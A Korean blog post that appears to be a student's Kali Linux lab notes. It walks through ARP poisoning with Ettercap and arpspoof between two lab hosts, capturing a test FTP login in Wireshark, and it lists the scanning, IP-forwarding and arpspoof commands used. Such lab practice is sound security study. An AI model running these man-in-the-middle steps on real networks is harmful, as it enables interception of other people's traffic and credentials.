Self-Improvement

Ettercap툴을 이용한 Packet Sniffing 본문

Kali Linux/Tools 실습

Ettercap툴을 이용한 Packet Sniffing

JoGeun 2018. 10. 20. 14:04

*Ettercap툴을 이용한 Packet Sniffing 실습
 (kali)
 #wireshark &
 #ettercap -G & (그래픽모드로 실행)
 ※ettercap -T & (TUI모드로 실행)

 -----------------------------설정------------------------------
 Sniff > Unified sniffing > eth1 
 Hosts > Scan fo hosts (주변 호스트들을 검색함)
 Hosts > Host list (검색한 호스트 리스트를 봄)
 192.168.92.200 > Add to Target1 (linux을 타겟1)
 192.168.92.201 > Add to Target2 (win2008을 타겟2)
 Mitm > Arp poisoning > Sniff remote connection (ARP Spoofing 작업을 함)
 Start > start sniffing (시작을함)
 ---------------------------------------------------------------
※kali의 포워딩 기능은 on이 되어 있어야함 (블로그 검색)

 wireshark에서 확인하며 ARP Spoofing을 위해 ARP을 지속적으로 보내고 있다.

 
 (win2008)
 ※사전에 linux과 교신을 했다면 c:>arp -d
 c:>arp -a (linux의 MAC은 kali와 같음)

 c:>ftp 192.168.92.201
 root
 soldesk1.
 ls
 quit

 (kali)
 wireshark에서 패킷확인하기

 Ettercap에서도 확인하고 종료하기

 mitm > Stop mitm attack
 Start > Stop sniffing

 ※ARP Spoofing 명령어
 (kali)
 #nmap -F 192.168.92.0/24
 #echo 1 > /proc/sys/net/ipv4/ip_forward (포워딩기능 on)
 #arpspoof -i eth1 -t 192.168.92.200 192.168.92.201
 #arpspoof -i eth1 -t 192.168.92.201 192.168.92.200